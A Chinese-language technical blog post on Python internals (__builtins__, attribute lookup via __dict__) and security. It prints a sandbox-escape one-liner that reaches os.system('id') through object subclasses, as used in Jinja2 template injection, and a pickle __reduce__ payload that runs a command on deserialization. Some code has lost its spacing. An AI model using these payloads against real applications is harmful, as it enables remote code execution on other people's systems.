python pickle反序列化漏洞_Python的一些高级特性以及反序列化漏洞

0x01 简述

文章主要记录一下python高级特性以及安全相关的问题

python作为脚本语言，其作为高级语言是由c语言开发的，关于python的编译和链接可以看向这里https://github.com/python/cpython(建议自己读读源码，可以更好的理解python的语言特性等。)

python标准库：

python标准库包含内置模块(有c语言实现，主要提供接入系统的基本功能，例如文件的IO)，还有一些python实现的模块提供了类似于其它语言的一些标准解决方案。

python自带了内置库和第三方库的文档查看器：命令行输入：

python –m pydoc –p 8888

查看

内置模块(c语言实现)

内置模块(python实现)

第三方模块

python一般的package结构图

0x02 python的一些特性

1> __builtin__与__builtins__的区别与关系

python有一个内建模块，该模块会在python启动后，但在没有执行python代码前，会被加载到内存.即可用调用里面的函数，其中__builtin__只存在与python2.x中__builtins__在python2.x/3.x都有，是内建模块一个引用，与__builtin__相同的是也会一开始被先于程序加载到内存它们存在如下的区别：

1、在主模块main中，__builtins__是对内建模块__builtin__本身的引用，即__builtins__完全等价于__builtin__，二者完全是一个东西，不分彼此

2、非主模块main中，__builtins__仅是对__builtin__.__dict__的引用，而非__builtin__本身可以参考这篇文章： https://www.jianshu.com/p/645e97383c1f

2> 属性的__dict__

Python中的属性是分层定义的,当我们需要调用某个属性的时候，Python会一层层向上遍历，直到找到那个属性。(某个属性可能出现在不同的层被重复定义，Python向上的过程中，会选取先遇到的那一个，也就是比较低层的属性定义)。

下面用张图展示一下其中的关系

例如下面的代码：

classbird(object):

feather=Trueclasschicken(bird):

fly=Falsedef __init__(self, age):

self.age=agedefeat(self):print("eat")classmalechicken(object):

sex= "male"summer= chicken(2)print(bird.__dict__)print(chicken.__dict__)print(summer.__dict__)

输出：

/Library/Frameworks/Python.framework/Versions/3.5/bin/python3.5 /Users/m0rk/GitHub/Demo/request_debug.py

{'__doc__': None, '__module__': '__main__', '__weakref__': , '__dict__': , 'feather': True}

{'__doc__': None, '__module__': '__main__', 'fly': False, 'malechicken': , '__init__': , 'eat': }

{'age': 2}

Process finished with exit code 0

可参考：

http://www.cnblogs.com/vamei/archive/2012/12/11/2772448.html

http://hbprotoss.github.io/posts/python-descriptor.html

0x03 python沙箱绕过

最早的文章见这里https://hexplo.it/escaping-the-csawctf-python-sandbox/

rickgray 修改成更为通用的poc，文章见这里 http://rickgray.me/use-python-features-to-execute-arbitrary-codes-in-jinja2-templates

[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('id')

0x04 反序列化漏洞

同其它语言一样，python也有序列化的功能，官方库里提供了pickle/cPickle的库用于序列化和反序列化，这两个库的作用和使用方法都是一致的，只是一个用纯py实现，另一个用c实现。

python序列化的payload如下：

#!/usr/bin/env python

importcPickleimportosclassexp(object):def __reduce__(self):

ser= """put command here"""

return(os.system, (ser,))

e=exp()

ser= cPickle.dumps(e)

当有存在漏洞的系统反序列化我们的payload的时候，命令就执行了。

0x05 其它

在这篇文章中 Python Pickle反序列化带来的安全问题(http://www.vuln.cn/8094) 作者提到了 请灵活使用google 即在google中搜索 cPickle.loads( site:github.com 既可寻找反序列化在现实中的应用，挺不错的，学习了

0x06 Reference

1. https://github.com/bit4woo/python_sec

2. Python Pickle反序列化带来的安全问题  http://www.vuln.cn/8094

3.python 正向连接后门 https://www.leavesongs.com/PYTHON/python-shell-backdoor.html